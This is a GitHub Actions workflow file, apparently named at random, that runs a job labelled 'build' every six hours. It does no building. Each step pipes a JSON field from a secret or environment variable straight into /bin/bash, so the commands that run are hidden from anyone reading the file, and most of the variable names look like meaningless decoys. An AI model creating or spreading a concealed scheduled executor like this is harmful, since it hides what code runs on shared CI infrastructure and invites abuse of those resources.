name: watchwordstudent
on:
  workflow_dispatch:
  schedule:
    - cron: '18 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: watchwordstudent
        env:
          c10: ${{ secrets.c10 }}
        run: |
          echo $c10 | jq -r .m86 | /bin/bash
          echo $xeatp8470 | jq -r .c88704 | /bin/bash
          echo $lednv6886 | jq -r .qn3 | /bin/bash
          echo $duhr2 | jq -r .wh75502 | /bin/bash
          echo $uivwf0548 | jq -r .gn579 | /bin/bash
          echo $xant15297 | jq -r .etd27 | /bin/bash
          echo $mwucp19 | jq -r .mr65219 | /bin/bash
          echo $yzia464 | jq -r .d92 | /bin/bash
          echo $zqnf4942 | jq -r .ixmry270 | /bin/bash

